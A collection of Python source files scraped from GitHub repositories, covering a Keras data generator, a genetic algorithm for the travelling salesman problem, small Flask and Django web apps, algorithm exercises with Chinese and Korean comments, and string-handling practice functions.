+{"seq_id":"11723131283","text":"def generator(input_ids,attention_mask,send_s_po,start_tokens,end_tokens,c_relation,batch_size):\n i=0\n while 1:\n input_ids_b = input_ids[i*batch_size:(i+1)*batch_size]\n attention_mask_b = attention_mask[i*batch_size:(i+1)*batch_size]\n send_s_po_b = send_s_po[i*batch_size:(i+1)*batch_size]\n start_tokens_b = start_tokens[i*batch_size:(i+1)*batch_size]\n end_tokens_b = end_tokens[i*batch_size:(i+1)*batch_size]\n c_relation_b = c_relation[i*batch_size:(i+1)*batch_size]\n # 最重要的就是这个yield,它代表返回,返回以后循环还是会继续,然后再返回。就比如有一个机器一直在作累加运算,但是会把每次累加中间结果告诉你一样,直到把所有数加完\n yield({'input_1': input_ids_b, 'input_2': attention_mask_b,'input_3':send_s_po_b}, \n {'s_start': start_tokens_b,'s_end':end_tokens_b,'relation':c_relation_b})\n i = (i+1)%(len(input_ids)//batch_size)\n \nmodel.fit_generator(generator(input_ids,attention_mask,send_s_po,start_tokens,end_tokens,c_relation,batch_size),epochs=eopch,steps_per_epoch=steps_per_epoch,verbose=1,\n callbacks=[Metrics(model_2,model_3,id2p,va_text_list,va_spo_list,va_input_ids,va_attention_mask,tokenizer)])\n","repo_name":"zhengyanzhao1997/NLP-model","sub_path":"model/Trick/fit_generator.py","file_name":"fit_generator.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","stars":265,"dataset":"github-code","pt":"39"}
+{"seq_id":"31692147134","text":"import time\nimport numpy as np\nfrom tqdm import trange\nimport matplotlib.pyplot as plt\n\n\n\ndef PMX(ind1, ind2, separator_no=2):\n new_ind1, new_ind2 = ind1.copy(), ind2.copy()\n idxs = sorted(np.random.choice(len(ind1), separator_no, replace=False))\n \n group = np.random.choice(separator_no-1)\n start, end = idxs[group], idxs[group+1]\n \n tmp = ind1[start:end].copy()\n ind1[start:end] = ind2[start:end]\n ind2[start:end] = tmp\n \n for i in range(len(ind1)):\n if start <= i < end:\n continue\n \n while ind1[i] in ind1[start:end]:\n # get elem from the other ind\n idx_of_elem = np.nonzero(ind1[start:end] == ind1[i])[0][0]\n ind1[i] = ind2[start+idx_of_elem]\n \n while ind2[i] in ind2[start:end]:\n # get elem from the other ind\n idx_of_elem = np.nonzero(ind2[start:end] == ind2[i])[0][0]\n ind2[i] = ind1[start+idx_of_elem]\n\n return ind1, ind2\n\ndef tsp_objective_function(p, dist):\n s = 0.0\n for i in range(len(p)):\n s += dist[p[i-1], p[i]]\n return s\n\ndef reverse_sequence_mutation(p, *args):\n a = np.random.choice(len(p), 2, False)\n i, j = a.min(), a.max()\n q = p.copy()\n q[i:j+1] = q[i:j+1][::-1]\n return q\n\ndef default_generate_population_function(chromosome_length, population_size):\n current_population = np.array([np.random.permutation(chromosome_length).astype(np.int64) \n for _ in range(population_size)])\n return current_population\n\n\nclass SGA:\n \n def __init__(self, population_size, chromosome_length, distance_matrix, crossover_func=PMX, objective_func=tsp_objective_function, mutation_func=reverse_sequence_mutation, generate_population_func=default_generate_population_function, replace_method='mu+lambda', number_of_offspring=None, crossover_probability = 0.95, mutation_probability = 0.25, number_of_iterations = 250, no_groups=2):\n \n self.population_size = population_size\n self.chromosome_length = chromosome_length\n \n self.crossover_func = crossover_func\n self.objective_func = objective_func\n self.mutation_func = mutation_func\n self.generate_population_func = generate_population_func\n self.distance_matrix = distance_matrix\n \n if number_of_offspring is None:\n number_of_offspring = population_size\n self.number_of_offspring = number_of_offspring\n self.crossover_probability = crossover_probability\n self.mutation_probability = mutation_probability\n self.number_of_iterations = number_of_iterations\n assert replace_method in ['mu+lambda', 'lambda'], 'wrong replace_method: [\"mu+lambda\", \"lambda\"]'\n self.replace_method = replace_method\n self.no_groups = no_groups\n \n \n def run(self, verbose=False, with_tqdm=False):\n time0 = time.time()\n self.mean_costs = np.zeros(self.number_of_iterations)\n self.min_costs = np.zeros(self.number_of_iterations)\n self.max_costs = np.zeros(self.number_of_iterations)\n\n self.best_objective_value = np.Inf\n self.best_chromosome = np.zeros((1, self.chromosome_length))\n\n current_population = self._generate_random_population()\n objective_values = np.array(list(map(lambda ind: self.objective_func(ind, self.distance_matrix), current_population)))\n \n if with_tqdm:\n range_ = trange(self.number_of_iterations, position=0, leave=True)\n else:\n range_ = range(self.number_of_iterations)\n \n for t in range_:\n parent_indices = self._select_parent_indices(objective_values)\n\n children_population = self._generate_children_population(current_population, parent_indices)\n\n self._mutate_children_population(children_population)\n\n children_objective_values = self._eval_children(children_population)\n \n current_population, objective_values = self._replace_population(current_population, objective_values, children_population, children_objective_values)\n\n # recording some statistics\n if self.best_objective_value < objective_values[0]:\n self.best_objective_value = objective_values[0]\n self.best_chromosome = current_population[0, :]\n \n self.mean_costs[t] = objective_values.mean()\n self.min_costs[t] = objective_values.min()\n self.max_costs[t] = objective_values.max()\n \n if verbose:\n print('%3d %14.8f %12.8f %12.8f %12.8f %12.8f' % (t, time.time() - time0, objective_values.min(), objective_values.mean(), objective_values.max(), objective_values.std()))\n \n \n def plot_costs(self, title=''):\n plt.title(title)\n plt.plot(self.max_costs, label='max')\n plt.plot(self.min_costs, label='min')\n plt.plot(self.mean_costs, label='mean')\n plt.show()\n \n \n def _generate_random_population(self):\n return self.generate_population_func(self.chromosome_length, self.population_size)\n \n \n def _generate_children_population(self, current_population, parent_indices):\n children_population = np.zeros((self.number_of_offspring, self.chromosome_length), dtype=np.int64)\n \n for i in range(self.number_of_offspring//2):\n if np.random.random() < self.crossover_probability:\n children_population[2*i, :], children_population[2*i+1, :] = self.crossover_func(current_population[parent_indices[2*i], :].copy(), current_population[parent_indices[2*i+1], :].copy(), self.no_groups)\n else:\n children_population[2*i, :], children_population[2*i+1, :] = current_population[parent_indices[2*i], :].copy(), current_population[parent_indices[2*i+1]].copy()\n\n if np.mod(self.number_of_offspring, 2) == 1:\n children_population[-1, :] = current_population[parent_indices[-1], :]\n \n return children_population\n \n \n def _select_parent_indices(self, objective_values):\n fitness_values = objective_values.max() - objective_values\n \n if fitness_values.sum() > 0:\n fitness_values = fitness_values / fitness_values.sum()\n else:\n fitness_values = np.ones(self.population_size) / self.population_size\n parent_indices = np.random.choice(self.population_size, self.number_of_offspring, \n True, fitness_values).astype(np.int64)\n return parent_indices\n \n \n def _mutate_children_population(self, children_population):\n for i in range(self.number_of_offspring):\n if np.random.random() < self.mutation_probability:\n children_population[i, :] = self.mutation_func(children_population[i, :], self.no_groups)\n \n \n def _eval_children(self, children_population):\n children_objective_values = np.zeros(self.number_of_offspring)\n for i in range(self.number_of_offspring):\n children_objective_values[i] = self.objective_func(children_population[i, :], self.distance_matrix)\n return children_objective_values\n \n \n def _replace_population(self, current_population, objective_values, children_population, children_objective_values):\n if self.replace_method == 'mu+lambda':\n objective_values = np.hstack([objective_values, children_objective_values])\n current_population = np.vstack([current_population, children_population])\n\n idxs = np.argsort(objective_values)\n current_population = current_population[idxs[:self.population_size], :]\n objective_values = objective_values[idxs[:self.population_size]]\n elif self.replace_method == 'lambda':\n current_population = children_population\n objective_values = children_objective_values\n \n return current_population, objective_values","repo_name":"jgrodzicki/UWR-II","sub_path":"Algorytmy Ewolucyjne/Assignment 2/SGA.py","file_name":"SGA.py","file_ext":"py","file_size_in_byte":8034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"5267155337","text":"import time\nimport tkinter\nimport tkinter.messagebox\n\ndef download():\n # 模拟下载任务需要花费10秒钟时间\n time.sleep(10)\n tkinter.messagebox.showinfo('提示', '下载完成!')\n\n# 显示信息\ndef show_about():\n tkinter.messagebox.showinfo('关于', '作者: 骆昊(v1.0)')\n\ndef main():\n # 建议一个页面\n top = tkinter.Tk()\n # 标题\n top.title('单线程')\n # 窗口大小\n top.geometry('200x150')\n top.wm_attributes('-topmost', True)\n\n # 面板\n panel = tkinter.Frame(top)\n # 下载 按钮\n button1 = tkinter.Button(panel, text='下载', command=download)\n button1.pack(side='left')\n # 关于 按钮\n button2 = tkinter.Button(panel, text='关于', command=show_about)\n button2.pack(side='right')\n panel.pack(side='bottom')\n\n tkinter.mainloop()\n\nif __name__ == '__main__':\n main()","repo_name":"PorterZhang2021/Python-StudyNotes","sub_path":"1.Python-100-Days-StudyNotes/基础篇/代码/Day13/code_8.py","file_name":"code_8.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"28025526495","text":"from flask import Flask, jsonify, request\nfrom flask_cors import CORS\nimport requests\nfrom bs4 import BeautifulSoup\n\napp = Flask(__name__)\nCORS(app)\n\n@app.route('/scrape', methods=['GET', 'POST'])\ndef scrape():\n if request.method == 'POST':\n url = request.form.get('url_to_scrape', 'http://localhost/my_git/python/app_1/test.html') # Use POST field if available\n else:\n url = 'http://localhost/my_git/python/app_1/test.html' # Default URL to scrape\n\n headers = {'User-Agent': 'Mozilla/5.0'}\n r = requests.get(url, headers=headers)\n \n if r.status_code == 200:\n soup = BeautifulSoup(r.content, 'html.parser')\n items = []\n\n for a_tag in soup.find_all('a', class_='something'):\n items.append(a_tag.text)\n\n return jsonify({'items': items})\n else:\n return jsonify({'error': 'Failed to retrieve data', 'status_code': r.status_code})\n\n@app.route('/another', methods=['GET'])\ndef another_route():\n page = request.args.get('page', 0, type=int)\n name = request.args.get('name', \"\", type=str)\n print(f\"Page variable is: {page}\")\n return jsonify({\"message\": \"Hello from another route!\", \"page\" : page, \"name\" : name})\n\n@app.route('/test', methods=['POST'])\ndef test_route():\n name = request.form.get('name', 'Anonymous') # Default to \"Anonymous\" if \"name\" is not provided\n return jsonify({\"message\": f\"Hello, {name}!\"})\n\nif __name__ == '__main__':\n app.run(port=5000)\n","repo_name":"xrvel/python","sub_path":"app_1/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"71759144435","text":"# 给定 m x n 矩阵 matrix 。\n#\n# 你可以从中选出任意数量的列并翻转其上的 每个 单元格。(即翻转后,单元格的值从 0 变成 1,或者从 1 变为 0 。)\n#\n# 返回 经过一些翻转后,行与行之间所有值都相等的最大行数 。\n#\n#\n#\n# 示例 1:\n#\n# 输入:matrix = [[0,1],[1,1]]\n# 输出:1\n# 解释:不进行翻转,有 1 行所有值都相等。\n# 示例 2:\n#\n# 输入:matrix = [[0,1],[1,0]]\n# 输出:2\n# 解释:翻转第一列的值之后,这两行都由相等的值组成。\n# 示例 3:\n#\n# 输入:matrix = [[0,0,0],[0,0,1],[1,1,0]]\n# 输出:2\n# 解释:翻转前两列的值之后,后两行由相等的值组成。\n#\n#\n# 提示:\n#\n# m == matrix.length\n# n == matrix[i].length\n# 1 <= m, n <= 300\n# matrix[i][j] == 0 或 1\nfrom collections import Counter\nfrom typing import List\n\n\nclass Solution:\n def maxEqualRowsAfterFlips1(self, matrix: List[List[int]]) -> int:\n r, c = len(matrix), len(matrix[0])\n n_group = 1\n group = [range(r)]\n def divide(l, j): # l 是一个分组的所有下标列表,第 j 列与第 0 列 对应行进行异或运算,按结果进行分组\n a, b = [], []\n for i in l:\n if matrix[i][0] ^ matrix[i][j]:\n a.append(i)\n else:\n b.append(i)\n if len(a) > len(b):\n return a, b\n return b, a\n for i in range(1, c):\n for k, g in enumerate(group):\n if len(g) == 0: continue\n a, b = divide(g, i)\n if len(b) == 0: continue\n group[k] = a\n group.append(b)\n return max(len(g) for g in group)\n\n def maxEqualRowsAfterFlips(self, matrix: List[List[int]]) -> int:\n # 更简洁的方法\n r, c = len(matrix), len(matrix[0])\n nums = [0] * r\n for i in range(r):\n reverse = True if matrix[i][0] == 1 else False\n for j in range(c):\n if reverse:\n matrix[i][j] ^= 1\n nums[i] = (nums[i] << 1) + matrix[i][j]\n c = Counter(nums)\n return max(c.values())\n\n","repo_name":"wangsun39/leetcode","sub_path":"all-code/1000-1100/1072maxEqualRowsAfterFlips.py","file_name":"1072maxEqualRowsAfterFlips.py","file_ext":"py","file_size_in_byte":2212,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"17694288372","text":"class SumNums():\n def __init__(self,nums,target):\n self.nums=nums\n self.target=target\n numbers=[]\n index=[]\n for i in self.nums:\n numbers.append(i)\n numbers.sort()\n numbers.reverse()\n for i in numbers:\n if self.target-i>=0:\n for j in self.nums:\n if i==j:\n index.append(self.nums.index(j))\n self.target-=i\n index.sort()\n for i in index:\n print('index-',i)\nprint(SumNums([2,4,3,1],7))","repo_name":"knnaliev95/InterviewPreparation","sub_path":"sumnums.py","file_name":"sumnums.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"40803889921","text":"import sys\nsys.stdin = open('input.txt', 'r')\n\n# 빨간 구슬을 구멍을통해 빼냄\n# 보드에 구멍이 하나 있따\n# 게임이 실패하는 경우 -1 을 출력한다\n# 1. 파란 구슬이 구멍에 들어가면 x 2. 동시에 빠져도 실패 3.더이상 구슬이 움직이지 x\n# 중력\n\nn, m = map(int, input().split())\narr = list(list(input()) for _ in range(n))\n\n################### DAY 9, 백준 코드랑 비교\nrx = ry = bx = by = gx = gy = 0\nfor i in range(n):\n for j in range(m):\n # 빨간 공\n if arr[i][j] == 'R':\n rx, ry = i, j\n arr[i][j] = '.'\n # 파란 공\n elif arr[i][j] == 'B':\n bx, by = i, j\n arr[i][j] = '.'\n elif arr[i][j] == 'O':\n gx, gy = i, j\n# print(gx, gy)\ndef inbox(x, y):\n if 0 <= x < n and 0 <= y < m and arr[x][y] != '#':\n return True\n else:\n return False\n\ndef gravity(x, y, dx, dy):\n\n while True:\n # 벽을 만나서 멈추면\n if not inbox(x, y):\n x -= dx\n y -= dy\n return x, y\n if x == gx and y == gy:\n return x, y\n x += dx\n y += dy\n\n\ndef bfs(ri, rj, bi, bj):\n visited = {(i, j, ii, jj): 0 for i in range(n) for j in range(m) for ii in range(n) for jj in range(m)}\n visited[(ri, rj, bi, bj)] = 1\n q = [(0, ri, rj, bi, bj)]\n while q:\n d, rx, ry, bx, by = q.pop(0)\n # if d > 10: return -1\n # print(d, rx, ry, bx, by)\n for dx, dy in (0, 1), (1, 0), (0, -1), (-1, 0):\n red = gravity(rx, ry, dx, dy)\n blue = gravity(bx, by, dx, dy)\n nrx, nry = red[0], red[1]\n nbx, nby = blue[0], blue[1]\n # 두 개다 빠진 경우\n if arr[nrx][nry] == 'O' and arr[nbx][nby] == 'O':\n continue\n # 두 개 좌표가 같을 경우\n # 더 가까이 있던 공을 위치로\n if red == blue:\n reddis = abs(rx-nrx) + abs(ry-nry)\n bluedis = abs(bx-nbx) + abs(by-nby)\n if reddis > bluedis:\n nrx -= dx\n nry -= dy\n else:\n nbx -= dx\n nby -= dy\n\n # 파란공만 빠진 경우\n if arr[nrx][nry] != 'O' and arr[nbx][nby] == 'O':\n continue\n # 빨간공이 빠졌을 경우\n if arr[nrx][nry] == 'O' and arr[nbx][nby] != 'O':\n return d+1\n if rx == nrx and ry == nry and bx == nbx and by == nby:continue\n if visited[(nrx, nry, nbx, nby)]: continue\n visited[(nrx, nry, nbx, nby)] = 1\n q.append((d+1, nrx, nry, nbx, nby))\n return -1\n\n\nprint(bfs(rx, ry, bx, by))\n# 뭐부터 검사해야하는지 순서가 무척 중요했다\n# 아... visited 체크를 안했다..바보다 바보 ..","repo_name":"sigk218/algorithm_100","sub_path":"2019-2020.08/93_baekjoon_구슬탈출.py","file_name":"93_baekjoon_구슬탈출.py","file_ext":"py","file_size_in_byte":2892,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"11235727402","text":"# pylint: disable=C0114, C0115, E5142\nfrom django.db import models\nfrom django.contrib.auth.models import User\n\n# Base class for all feed activities\nclass Activity(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n last_modified = models.DateTimeField(auto_now=True)\n\n class Meta:\n ordering = [\"-last_modified\"]\n","repo_name":"ChicoState/readerhub","sub_path":"app1/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"32422382603","text":"import re\n# Написать регулярное выражение, определяющее является ли данная строка \n#строкой \"abcdefghijklmnopqrstuv18340\" или нет.\ndef stringing(a):\n if not a :\n return False\n str='abcdefghijklmnopqrstuv18340'\n result = re.findall(a, str) \n if result==str.split():\n return True\n else:\n return False\n ","repo_name":"inessa111/Program-engineering-","sub_path":"Labs/LR1/module/lr1_2.py","file_name":"lr1_2.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"15550178052","text":"def solve(n, k):\n cnt = 0\n for d in range(1, n + 1):\n if n % d == 0:\n cnt += 1\n if cnt == k:\n return d\n return 0\n\nN, K = map(int, input().split())\nprint(solve(N, K))","repo_name":"joonion/computational-thinking-for-coding","sub_path":"Chap.04.Sorting&Searching/2501.약수구하기/solve.1.py","file_name":"solve.1.py","file_ext":"py","file_size_in_byte":210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"7593650262","text":"import matplotlib.pyplot as plt\nimport csv\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib import cm\nfrom matplotlib.ticker import LinearLocator, FormatStrFormatter\nimport numpy as np\n\n\ndef read_grid(File):\n ''' \n read_grid - Reads a CSV file\n Parameters\n ----------\n File : CSV file\n \n Returns\n -------\n X : X axis of grid : Numpy array\n Y : Y axis of grid : Numpy array\n Grid : XY grid of energies : 2d numpy array\n '''\n Data = np.genfromtxt(File, delimiter=',', dtype=\"float\")\n \n X = Data[0]\n X = np.delete(X, 0)\n Y = (Data[:,0])\n Y = np.delete(Y, 0)\n\n Grid = np.array([])\n \n for i in range(1, (X.size + 1)):\n Temp = Data[:,i]\n Temp = np.delete(Temp, 0)\n Grid = np.append(Grid, Temp)\n \n Grid = np.reshape(Grid, (X.size, Y.size))\n return X, Y, Grid \n\ndef grid_plot(X, Y, Grid):\n '''\n grid_plot - Plot the energy surface\n \n Parameters\n ----------\n X : X axis of grid : Numpy array\n Y : Y axis of grid : Numpy array\n Grid : XY grid of energies : 2d numpy array\n '''\n X, Y = np.meshgrid(X, Y)\n plt.contourf(X, Y, Grid, 25, cmap='jet', interpolation='nearest')\n plt.xlabel(\"Displacement in X (\" r'$\\AA$' \")\", fontsize=18)\n plt.ylabel(\"Displacement in Y (\" r'$\\AA$' \")\", fontsize=18)\n plt.tick_params(labelsize=14)\n plt.tight_layout()\n plt.colorbar()\n plt.savefig(\"Surface_Plot.png\", dpi=600)\n plt.close()\n\n\n\nX, Y, Grid = read_grid(\"grid.csv\")\ngrid_plot(X, Y, Grid)\n\n\n\n","repo_name":"symmy596/Metadise_GB_Scripts","sub_path":"GB-Surface.py","file_name":"GB-Surface.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"25884598624","text":"from django.shortcuts import render, get_list_or_404\n\nfrom django.http import HttpResponse\nfrom .models import SkinType, SkinConcern, Option, Question, Questionnaire, QuestionnaireUserData, QuestionnaireEntry\nfrom home.models import Ingredient, Base, MixingAgent, Recipe, FacePack, CustomFacePack, SkinTypeIngredient, SkinTypeConcernIngredient\nfrom django.contrib.auth.models import User\nfrom cart.models import Cart\nfrom userregistration.views import init_user_login\nfrom home.views import cart_size, get_valid_user_data\nfrom django.db.models import Q\nimport json\nimport random\nimport pdb\n\n# Create your views here.\n\ndef wizard(request):\n data = [] \n for q in Question.objects.all():\n data.append({ \n 'id' : q.id,\n 'name' : q.name,\n 'why' : q.why,\n 'multiple' : 'multiple' if q.id == 8 else '',\n 'options' : [{\n 'name': o['option__name'],\n 'id': o['option__id'], \n 'helper': o['option__helper']\n } for o in Questionnaire.objects.filter(question=q).\\\n values('option__name','option__id',\n 'option__helper')]\n })\n return render(request, \"wizard.html\", \n { 'questions': data, \n 'cart_size': cart_size(request),\n 'valid_user': get_valid_user_data(request) })\n\ndef wizard_submit(request):\n json_response = { 'success': False }\n if request.method == 'POST':\n init_user_login(request)\n data = json.loads(request.POST['data'])\n user = request.user\n skinType = None\n skinConcerns = None\n wz = QuestionnaireUserData() \n wz.user = user\n wz.save()\n for d in data:\n for o in d['options']:\n qe = QuestionnaireEntry()\n qe.question = Question.objects.get(pk=d['id'])\n qe.option = Option.objects.get(pk=o)\n qe.wizard = wz\n qe.save()\n if d['id'] == '7':\n skinType = SkinType.objects.get(pk=d['options'][0]);\n if d['id'] == '8':\n skinConcerns = SkinConcern.objects.filter(id__in=d['options'])\n recipes = Recipe.objects.filter(skin_type=skinType, skin_concern__in=skinConcerns)\n recipes_ing = [r.mandatory_ingredient for r in recipes]\n skin_type_ingredients = Ingredient.objects.filter(id__in=SkinTypeIngredient.objects.filter(skin_type=skinType).values('ingredient'))\n o_ids = []\n for r in recipes:\n ri = random.choice(SkinTypeConcernIngredient.objects\\\n .filter(skin_type=r.skin_type, skin_concern=r.skin_concern)\\\n .filter(~Q(ingredient=r.mandatory_ingredient), ~Q(ingredient_id__in=o_ids))).ingredient\n o_ids.append(ri)\n base = random.choice(Base.objects.filter(skin_type=skinType))\n \"\"\"\n Base conditions:\n 1. French green clay cannot be used for people with skin concern \"Sensitive\n and irritated by harsh ingredients\"\n 2. For skin combination oily and skin concern \" sensitive and irritated by\n harsh ingredients\" : always use white kaolin clay\n 3. For skin combination dry and skin concern \" sensitive and irritated by \n harsh ingredients\" : always use white goat milk powder\n \"\"\"\n if SkinConcern.objects.get(name__contains=\"Sensitive\") in skinConcerns:\n if skinType.name == 'Oily':\n base = Base.objects.get(name__contains='White Kaolin Clay')\n elif skinType.name == 'Dry':\n base = Base.objects.get(name__contains='Goat Milk')\n else:\n base = random.choice(Base.objects.filter(skin_type=skinType)\\\n .filter(~Q(pk=Base.objects.get(name__contains='French').id)))\n mixing_agent = random.choice(MixingAgent.objects.filter(skin_type=skinType))\n json_response = {\n 'base'\t : str(base.id),\n 'mixing_agent' : str(mixing_agent.id),\n 'recipes' : [str(r.id) for r in recipes],\n 'optional' : [str(o.id) for o in o_ids],\n 'qd' : str(wz.id),\n } \n return HttpResponse(json.dumps(json_response, ensure_ascii=False))\n\ndef results(request):\n if request and request.method == 'GET':\n init_user_login(request)\n user = request.user\n recipe_ids = [int(x) for x in request.GET.getlist('recipes[]')]\n o_ids = [int(x) for x in request.GET.getlist('optional[]')]\n recipes = Recipe.objects.filter(id__in=recipe_ids)\n secondary_ings = Ingredient.objects.filter(id__in=o_ids)\n qd_id = request.GET.get('qd')\n skin_type = request.GET.get('skin_type', None)\n base = Base.objects.get(pk=request.GET.get('base'))\n mixing_agent = MixingAgent.objects.get(pk=request.GET.get('mixing_agent'))\n #secondary_ings = [random.choice(SkinTypeConcernIngredient.objects\\\n #.filter(skin_type=r.skin_type, skin_concern=r.skin_concern)\\\n #.filter(~Q(ingredient=r.mandatory_ingredient))).ingredient\\\n #for r in recipes]\n essential_oils = Ingredient.objects.get(name__contains=\"Essential Oils\")\n r1 = recipes[0]\n r2 = recipes[1]\n r3 = recipes[2]\n o1 = secondary_ings[0]\n o2 = secondary_ings[1]\n o3 = secondary_ings[2]\n o_ids = [i.id for i in secondary_ings]\n\n data = {\n 'first': {\n 'type': 'primary',\n 'base': {\n 'id': base.id,\n 'name': base.name,\n 'image': base.image,\n 'helper': base.helper,\n 'description': base.description, \n },\n 'mixing_agent': {\n 'id': mixing_agent.id,\n 'name': mixing_agent.name,\n 'image': mixing_agent.image,\n 'helper': mixing_agent.helper,\n 'description': mixing_agent.description, \n },\n 'essential_oils': {\n 'id': essential_oils.id,\n 'name': essential_oils.name,\n 'image': essential_oils.image,\n 'helper': essential_oils.helper,\n 'description': essential_oils.description,\n },\n 'recipes': [{\n 'id': r.id,\n 'i_id': r.mandatory_ingredient.id,\n 'i_name': r.mandatory_ingredient.name,\n 'i_image': r.mandatory_ingredient.image,\n 'i_helper': r.mandatory_ingredient.helper,\n 'i_description': r.mandatory_ingredient.description,\n } for r in recipes],\n 'b_id': base.id,\n 'm_id': mixing_agent.id,\n 'r1_id': r1.id,\n 'r2_id': r2.id,\n 'r3_id': r3.id,\n 'o_ids': [],\n 'qd_id': qd_id,\n },\n 'second': {\n 'type': 'secondary',\n 'base': {\n 'id': base.id,\n 'name': base.name,\n 'image': base.image,\n 'helper': base.helper,\n 'description': base.description, \n },\n 'mixing_agent': {\n 'id': mixing_agent.id,\n 'name': mixing_agent.name,\n 'image': mixing_agent.image,\n 'helper': mixing_agent.helper,\n 'description': mixing_agent.description, \n },\n 'essential_oils': {\n 'id': essential_oils.id,\n 'name': essential_oils.name,\n 'image': essential_oils.image,\n 'helper': essential_oils.helper,\n 'description': essential_oils.description,\n },\n #'recipes': [{\n #'id': r.id,\n #'i_id': r.mandatory_ingredient.id,\n #'i_name': r.mandatory_ingredient.name,\n #'i_image': r.mandatory_ingredient.image,\n #'i_helper': r.mandatory_ingredient.helper,\n #'i_description': r.mandatory_ingredient.description,\n #} for r in recipes],\n 'recipes': [{\n 'id': i.id,\n 'i_id': i.id,\n 'i_name': i.name,\n 'i_image': i.image,\n 'i_helper': i.helper,\n 'i_description': i.description,\n } for i in secondary_ings],\n 'b_id': base.id,\n 'm_id': mixing_agent.id,\n 'r1_id': r1.id,\n 'r2_id': r2.id,\n 'r3_id': r3.id,\n 'o1_id': o1.id,\n 'o2_id': o2.id,\n 'o3_id': o3.id,\n 'o_ids': o_ids,\n 'qd_id': qd_id,\n },\n 'qd_id': qd_id,\n 'skin_type': skin_type,\n }\n data['cart_size'] = cart_size(request)\n data['valid_user'] = get_valid_user_data(request)\n return render(request, \"results.html\", data)\n","repo_name":"dev1farms2face/f2f","sub_path":"farms2face/facepackwizard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"36874617680","text":"# Files\nfname = input(\"Enter file name: \")\nfh = open(fname)\ncount = 0\nsun = 0\nfor line in fh:\n if line.startswith(\"X-DSPAM-Confidence:\"):\n ipos = line.find(\":\")\n piece = line[ipos+1:]\n value = float(piece)\n count = count + 1\n sun = sun + value\nprint('Average spam confidence:', sun/count)","repo_name":"revacprogramming/python01-Tejadithya","sub_path":"ActivitySet01/problem08.py","file_name":"problem08.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"5437539935","text":"import time\nimport sys\n\nstart_time = time.time()\n\nfor line in sys.stdin:\n # solution found, print time\n if \"--\" in line:\n p = (time.time()-start_time)\n print(p)\n sys.stdout.write(line)\n sys.stdout.flush()","repo_name":"slipstreaming2/dissertation","sub_path":"bash/timingObjective.py","file_name":"timingObjective.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"39"}
+{"seq_id":"1605912163","text":"import urllib.request\nimport urllib.parse\n\n#1、确定爬取网页的url地址\nurl ='http://www.baidu.com/s'\nheader = {\n \"User-Agent\" : \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36\",\n \"Connection\" : \"keep-alive\"\n}\n\n\nwd = {'wd':'吴京'}\nurlwd = urllib.parse.urlencode(wd)\nurl = url+'?'+urlwd\n#2、根据url获取网页信息\nurlRequest = urllib.request.Request(url, headers=header)\n\n\nresponse = urllib.request.urlopen(urlRequest)\n\n# print(type(urlRequest))\n# print(type(response))\n# print(response.getcode())\n# print(response.getheader(name=\"User-Agent\"))\n# print(urlRequest.get_header('Connection'))\n# print(urlRequest.get_header(\"User-Agent\"))\n\nprint(response.geturl())\nprint(response.read().decode('utf-8'))","repo_name":"typeme/python_spider_study","sub_path":"Day05/demo01.py","file_name":"demo01.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"}
+{"seq_id":"33086828747","text":"def say_hello(name):\n return \"Hi my name is {}\".format(name)\n # takes in a name and returns the string \"Hi my name is \" plus the name\n # use whichever form of interpolation is most appropriate\n\ndef replace_given_substring(str_to_replace, str_to_insert, string):\n return string.replace(str_to_replace, str_to_insert)\n # this function takes three parameters --\n # the first is the substring we would like to replace.\n # the second substring is what we would like to use inplace of the first\n # the third is the actual string which we want to operate on\n # the function should return the new string\n\ndef remove_duplicate_punctuation(string_var):\n import string\n new_string = ''\n punctuation = string.punctuation\n for x in range(1,(len(string_var))):\n if string_var[x-1] not in punctuation:\n new_string = new_string + string_var[x-1]\n elif string_var[x-1] != string_var[x]:\n new_string = new_string + string_var[x-1]\n return new_string + string_var[-1]\n # should remove all duplicate punctuation marks in a given string\n # i.e. \"Hi!!!!!!\" should be reformatted to \"Hi!\"\n # i.e. \"Hello..... My name is Terrance!! How are you???\" -> \"Hello. My name is Terrance! How are you?\"\n\n\ndef validate_email_format(email):\n import string\n if email.count('@') == 1 and email.count('.com') == 1:\n special_char = string.punctuation\n person_part = (email.split('@'))[0]\n correct_email = ''\n for char in person_part:\n if char not in special_char:\n correct_email = correct_email + char\n if correct_email == person_part:\n return True\n else:\n return False\n else:\n return False\n\n # should make sure there are no special characters (i.e. *,~,#,$,%,&,(,),`,\",',:,;,/,>,<)\n # make sure the email 